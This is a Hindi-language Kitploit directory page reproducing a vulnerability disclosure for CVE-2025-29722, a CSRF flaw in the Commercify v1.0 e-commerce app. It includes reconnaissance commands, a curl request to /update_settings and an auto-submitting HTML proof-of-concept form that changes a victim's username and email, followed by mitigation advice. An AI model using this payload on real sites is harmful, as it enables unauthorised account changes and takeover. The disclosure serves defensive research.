Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29722 — Commercify v1.0 में Cross Site Request Forgery (CSRF) | Kitploit
उपकरण/GitHubGitHub/cypherdavy/cve-2025-29722
टोहीभेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

Commercify v1.0 में Cross Site Request Forgery (CSRF)

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE-2025-29722 – क्रॉस साइट रिक्वेस्ट फॉर्जरी (CSRF) Commercify v1.0 में

द्वारा खोजा गया: David P.S Abraham (उर्फ Davycipher)


CVE ID

CVE-2025-29722 को MITRE Corporation द्वारा यह भेद्यता निर्धारित की गई है।


सारांश

एक CSRF भेद्यता की पहचान Commercify v1.0 में की गई, जो @yassmittal द्वारा विकसित एक ओपन-सोर्स ई-कॉमर्स प्लेटफॉर्म है। एप्लिकेशन में महत्वपूर्ण एंडपॉइंट्स जैसे /update_settings पर उचित CSRF सुरक्षा तंत्र का अभाव है, जिससे हमलावर दुर्भावनापूर्ण अनुरोध तैयार कर सकते हैं जो किसी अन्य डोमेन से निष्पादित होने पर उपयोगकर्ता डेटा को संशोधित कर सकते हैं।


प्रभावित उत्पाद

  • उत्पाद नाम: Commercify
  • संस्करण: 1.0
  • रिपॉजिटरी: https://github.com/yassmittal/Commercify

भेद्यता प्रकार

  • CWE-352: क्रॉस-साइट रिक्वेस्ट फॉर्जरी (CSRF)

शोषण वॉकथ्रू

टोही चरण

nmap स्कैन ने खुलासा किया कि सेवा पोर्ट 5173 के माध्यम से सुलभ थी, जो एक संभावित विकास सर्वर का संकेत देता है।

root@kitploit:~
nmap -p 5173 localhost

इसके बाद, मैंने nikto का उपयोग करके ऐप को स्कैन किया, जिससे पता चला:

  • गुम X-Frame-Options हेडर
  • अनुज्ञेय CORS नीति (Access-Control-Allow-Origin: *)
  • CSRF सुरक्षा हेडर की कमी

एंडपॉइंट ब्रूट फोर्सिंग

एप्लिकेशन की खोज करते समय, मुझे यूजर डैशबोर्ड सुविधाओं के आधार पर एक संभावित update_settings एंडपॉइंट का संदेह हुआ। मैंने इसे इस प्रकार परीक्षण किया:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

हालांकि 404 Not Found लौटाया गया, यह व्यवहार पर्यावरण पर निर्भर हो सकता है। मान्य डिप्लॉयमेंट पर, इससे पूर्ण खाता हेरफेर हो सकता है।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

CSRF दोष का शोषण करने के लिए HTML-आधारित हमला:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

प्रभाव

  • उपयोगकर्ता खाता डेटा में अनधिकृत परिवर्तन
  • यदि सेटिंग्स में भूमिका या ईमेल हेरफेर शामिल है तो विशेषाधिकार उन्नयन
  • खाता अधिग्रहण परिदृश्य

मूल कारण

  • CSRF टोकन की कमी
  • कोई SameSite कुकी विशेषता नहीं
  • अनुज्ञेय CORS (*)
  • कोई रेफरर या ओरिजिन सत्यापन नहीं

शमन और सिफारिशें

  • सभी स्थिति-परिवर्तन एंडपॉइंट्स के लिए CSRF टोकन जोड़ें
  • कुकीज़ पर SameSite=Strict या Lax सेट करें
  • सख्त CORS नीतियां परिभाषित करें
  • ओरिजिन/रेफरर सत्यापन लागू करें

खोजकर्ता

David P.S. Abraham
उपनाम: Davycipher

  • GitHub
  • LinkedIn
  • Website

टूल डाउनलोड करें